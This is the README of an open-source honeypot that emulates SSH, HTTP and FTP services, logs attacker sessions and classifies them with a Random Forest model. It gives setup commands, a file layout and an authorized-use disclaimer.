A medium-interaction honeypot that emulates SSH, HTTP, and FTP services, logs all interactions to a structured database, and classifies attack sessions using a trained Random Forest model. Designed for deployment on a VPS or internal network segment to gather actionable threat intelligence.
- SSH honeypot using paramiko with full protocol-level emulation and fake shell
- HTTP honeypot with configurable fake pages (login forms, admin panels, WordPress)
- FTP honeypot with fake directory listings and file traps
- ML classification of attack sessions: brute force, reconnaissance, exploit attempts, malware delivery, lateral movement
- Rate limiting per source IP with configurable thresholds
- GeoIP enrichment for source IP geolocation
- Webhook alerts for high-severity attacks (Slack, Discord, generic)
- Flask dashboard with real-time stats, attack timeline, and classification breakdown
- Structured logging to SQLite + JSONL for offline analysis
- Fully typed codebase with comprehensive test suite
Internet
│
├──▶ [SSH :2222 (paramiko)] ──┐
├──▶ [HTTP :8080 (socket)] ──┼──▶ Rate Limiter ──▶ Logger ──▶ Classifier ──▶ Alerter
└──▶ [FTP :2121 (socket)] ──┘ (SQLite) (RF model) (webhook)
│
Dashboard (Flask :5000)
git clone https://github.com/yourusername/honeypot-attack-classifier.git
cd honeypot-attack-classifier
pip install -e ".[dev]"
# generate SSH host key
ssh-keygen -t rsa -b 2048 -f honeypot/keys/host_rsa_key -N ""
# train classifier (uses synthetic data for demo)
python -m honeypot.train --synthetic --samples 1000
# start the honeypot
python -m honeypot --ssh-port 2222 --http-port 8080 --ftp-port 2121
# view dashboard
python -m honeypot.dashboard
# open http://localhost:5000docker compose up -d
# view logs
docker compose logs -f honeypot
# dashboard at http://localhost:5000Edit config.yaml for ports, fake credentials, rate limits, alerting webhooks, and classifier thresholds. See config.yaml for full documentation of each setting.
pytest
pytest --cov=honeypot --cov-report=term-missing├── honeypot/
│ ├── __init__.py
│ ├── __main__.py # Entry point
│ ├── exceptions.py # Custom exceptions
│ ├── models.py # Data classes
│ ├── config.py # Configuration loader
│ ├── services/
│ │ ├── __init__.py
│ │ ├── ssh_server.py # Paramiko SSH honeypot
│ │ ├── http_server.py # HTTP honeypot
│ │ └── ftp_server.py # FTP honeypot
│ ├── logger_module.py # SQLite + JSONL logging
│ ├── rate_limiter.py # Per-IP rate limiting
│ ├── feature_builder.py # Session feature extraction
│ ├── classifier.py # ML attack classifier
│ ├── alerter.py # Webhook alerting
│ ├── train.py # Model training CLI
│ ├── dashboard.py # Flask dashboard
│ └── keys/ # SSH host keys
├── tests/
├── templates/
├── config.yaml
├── pyproject.toml
├── Dockerfile
├── docker-compose.yml
└── .github/workflows/ci.yml
For authorized security research and education only. Deploy only on networks you own or have explicit written permission to monitor. Running a honeypot without authorization may violate organizational policies or local laws.
MIT